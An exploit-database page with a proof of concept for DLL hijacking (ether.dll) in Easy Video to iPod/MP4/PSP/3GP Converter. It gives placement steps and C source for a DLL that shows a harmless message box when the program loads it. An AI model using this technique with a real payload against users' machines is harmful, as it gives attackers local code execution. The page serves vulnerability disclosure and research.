Advertisement






Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit (ether.dll)

CVE Category Price Severity
N/A CWE-426 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2017-02-20
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017020190

Below is a copy:

Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit (ether.dll)# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit (ether.dll)
# Date: 2016-09-24
# Exploit Author: Meisam Monsef [email protected] or [email protected] 
# Vendor Homepage: http://www.divxtodvd.net/ipod-mp4-psp-3gp.htm
# Software Download Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Demo Download Test : http://s8.picofile.com/file/8268480084/Easy_iPod_MP4_PSP_3GP.rar.html
# Dll Exploit Download File : http://s8.picofile.com/file/8268480242/ether.rar.html
# Version: All Version
# Tested on: Windows 10
 
 
Exploit :
1. Compile dll and rename to ether.dll 
2. Copy ether.dll to C:\Program Files (x86)\Easy iPod MP4 PSP 3GP
3. Launch Easy Video to iPod MP4 PSP 3GP Converter.exe
4. MessageBox Executed

 
#include <windows.h>
#define DllExport __declspec (dllexport)
 
BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}
 
int dll_hijack()
{
  MessageBoxA(0, "DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum